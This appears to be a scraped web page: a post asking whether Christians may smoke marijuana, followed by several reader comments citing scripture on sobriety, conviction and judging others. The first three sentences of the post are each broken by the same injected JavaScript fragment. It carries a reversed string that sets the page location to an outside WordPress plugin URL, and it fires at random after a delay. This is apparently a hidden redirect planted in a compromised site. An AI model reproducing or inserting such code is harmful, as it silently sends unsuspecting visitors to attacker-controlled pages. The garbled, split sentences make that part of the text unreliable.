Can Christians Smoke Weed?

Can Christians smoke marijuana? Is it against scripture for a Christian toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to smoke weed?

I see no reason within scripture toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to condemn the use of marijuana in a responsible, wise manor.

There are certainly times when a Christian should absolutely not use marijuana, but for us toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to place a blanket over marijuana with a “do not use” sticker is simply wrong.

Support each other, do not condemn each other.
(As long as the scriptures do not condemn such things.)

Rec use aside, assuming that it is well documented that marijuana has medicinal benefits (I haven't done my research), I find it absolutely insane to not use it over drugs that don't work just because there is a stigma around weed.

Thank you so much… I recently got baptized and have been trying to follow the word of God as much as I can and one thing that I used to do was smoke a lot of weed and I was struggling with that temptation but now I know that because it's illegal it's wrong and how it's about a wisdom thing and it depends how you use it when and why you use it I just feel like this video really helped me see marijuana for what it is. My family is apostolic and I consider myself that too. Your videos are great man I hope you keep doing what you're doing Thanks so much bro.

We're does the separation start ! Yes every person has certain convections but that is no excuse to drink and smoke weed I can use an excuse and say it doesn't bother me that doesn't mean that it is ok let us be transformed by the renewing of our minds

Thank you. I love when we can be respectful in controversial topics, not quarrelsome (2 Timothy 2:23-25)

I would stress is the constant command to be alert and sober minded (1 Peter 5:8, 1 Thessalonians 5:6, etc.), least the devil use that as a stepping stool for destruction (you did mention the second part)

I would also clarify that as Christians, we all have the same convictions, they aren't different….let me explain, God clearly gives instructions for His servants as a whole. Now there are clearly times God instructs an individual or specific group of individuals to do something, (ex: the Nazarite covenant, Paul preaching to the Gentiles, etc.), but that wouldn't make Samson and Paul exempt from the rest of instruction, they still had to faithfully obey (Paul still preached to Jews when the opportunity came , he didn't just say, "Na, son, that ain't my conviction" LOL ). Their obedience both specific instruction and general instruction are the fruit of their faith.

I say all this because sometimes we Christians get caught up in the "conviction lingo" as an excuse to not obey (ex: "I can do (insert sin)/I don't have to do (insert a good thing we want to withhold) because I didn't FEEL any conviction").

But, I really like how you addressed the desires of the heart by challenging us to ask why would we want to smoke weed, when do we want to smoke weed, and how do we want to smoke weed it points to the root of the desire.

I think, the issue is, weed is so heavily abused, it turns to the "go to high" that numbs a bad feeling or causes a good feeling. It seems to barely ever be used without the intention to get high (which is not using it in moderation, just like the buzz/intoxication in alcohol). In other words, the very intention of the use is to avoid a sober mind (in our culture).

So, even assuming you can trust get 100% "clean" bud (which is another issue), the desire to be high stands as an issue.

Now, are we supposed to judge our brothers and sisters that do this…no. We judge the situation as unholy, as the Word tells us to judge correctly (John 7:24). But we are not to judge the person (as in, condemn them); we have no heaven or hell to place people in (hallelujah because people can be friends one minute and enemies the next lol). If, I can't judge the act as unholy, how can I lead my wandering brother or sister back to the truth (James 5:19-20)?

Once again, thank you and God bless you.
